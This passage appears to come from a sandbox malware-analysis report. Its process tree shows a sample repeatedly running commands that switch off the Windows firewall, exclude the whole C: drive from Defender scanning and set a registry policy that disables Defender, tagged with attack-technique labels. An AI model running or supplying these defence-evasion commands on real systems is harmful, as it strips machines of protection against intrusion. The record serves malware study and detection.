      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5976
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:1792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1424
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2180
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5304
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2900
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    PID:2176
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    PID:6056
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4500
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2820
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5744
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5392
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4372
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2044
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1708
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5164
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5188
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4596
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5764
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6120
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2224
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5760
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5648
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4600
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5076
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2348
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:68
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5348
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5052
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5676
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5896
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1940
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4660
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2656
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2792
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5644
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4876
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3488
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4152
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2848
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1316
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2656
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5500
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2808
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:804
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:2456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5536
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5660
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5852
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3824
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6740
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6756
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3344
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:4160
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    PID:5604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6568
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6592
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6164
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:7056
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6392
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6248
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7096
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6856
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5224
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6512
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6864
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5720
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6572
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2316
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6032
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6376
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2208
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5852
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7004
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1968
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6560
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2100
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5380
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1100
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4156
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1308
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6572
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:7092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6488
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5136
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5888
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5348
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6200
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6152
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:8028
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:8044
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:8052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6256
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5792
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    PID:6700
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6600
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7124
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6952
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3012
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:3044
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1424
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6980
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6152
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6340
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    PID:7452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:8636
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:720
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:8648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6904
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5096
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6464
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2012
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:8188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    PID:9076
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5272
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:5420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command Add-MpPreference -ExclusionPath "C:\"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7748
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:6284
- - C:\Windows\SYSTEM32\NetSh.exe
    "NetSh.exe" Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:7836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
